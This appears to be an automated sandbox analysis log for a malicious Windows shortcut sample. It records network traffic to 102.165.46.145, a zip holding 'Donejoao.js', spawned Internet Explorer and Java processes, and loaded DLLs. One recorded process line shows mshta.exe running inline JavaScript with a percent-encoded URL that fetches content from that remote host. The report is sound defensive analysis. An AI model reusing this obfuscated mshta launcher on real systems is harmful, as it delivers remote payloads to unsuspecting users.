Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 84.2% probability |
Source: unknown |
HTTPS traffic detected: 102.165.46.145:443 -> 192.168.2.6:49723 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 102.165.46.145:443 -> 192.168.2.6:49724 version: TLS 1.2 |
Source: Joe Sandbox View |
JA3 fingerprint: 82dc2ea333123943700c0f6b3022789a |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 102.165.46.145Connection: Keep-Alive |
Source: mshta.exe, 00000001.00000002.2322453260.000001412703D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.2297663983.00000141270A3000.00000004.00000020.00020000.00000000.sdmp, {DC241728-8157-11EF-8C2D-ECF4BB2D2496}.dat.4.dr, ~DF3A347E01C7E1A4F8.TMP.4.dr |
String found in binary or memory: https://102.165.46.145/ |
Source: mshta.exe, 00000001.00000002.2322453260.000001412707E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://102.165.46.145/-; |
Source: mshta.exe, 00000001.00000002.2322453260.000001412702C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://102.165.46.145/2288 |
Source: mshta.exe, 00000001.00000002.2322453260.000001412702C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://102.165.46.145/n |
Source: unknown |
Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49723 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49723 |
Source: DocumentoRserva30513[1].zip.7.dr |
Zip Entry: reserva/Donejoao.js |
Source: classification engine |
Classification label: mal56.winLNK@8/10@0/1 |
Source: unknown |
Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" "javascript:window.location.href='%68%74%74%70%73%3A%2F%2F%31%30%32%2E%31%36%35%2E%34%36%2E%31%34%35%2F';close();" |
Source: unknown |
Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding |
Source: C:\Program Files\Internet Explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17410 /prefetch:2 |
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new |
Source: C:\Program Files\Internet Explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17414 /prefetch:2 |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wldp.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mshtml.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: iertutil.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: sspicli.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: powrprof.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: winhttp.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wkscli.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: netutils.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: umpdc.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: urlmon.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: srvcli.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msiso.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: uxtheme.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: srpapi.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msimtf.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dxgi.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: resourcepolicyclient.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: textinputframework.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coreuicomponents.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coremessaging.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ntmarta.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dataexchange.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d3d11.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dcomp.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: twinapi.appcore.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: jscript9.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wininet.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: windows.storage.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: profapi.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mswsock.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: iphlpapi.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: winnsi.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ieframe.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: netapi32.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: version.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: userenv.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ieproxy.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: sxs.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: onecorecommonproxystub.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msls31.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d2d1.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dwrite.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d3d10warp.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dxcore.dll |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: vcruntime140.dll |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: wininet.dll |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: version.dll |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: urlmon.dll |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: msvcp140.dll |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: iertutil.dll |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: srvcli.dll |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: netutils.dll |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: uxtheme.dll |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Process information set: NOOPENFILEERRORBOX |
Source: mshta.exe, 00000001.00000002.2322453260.0000014127059000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |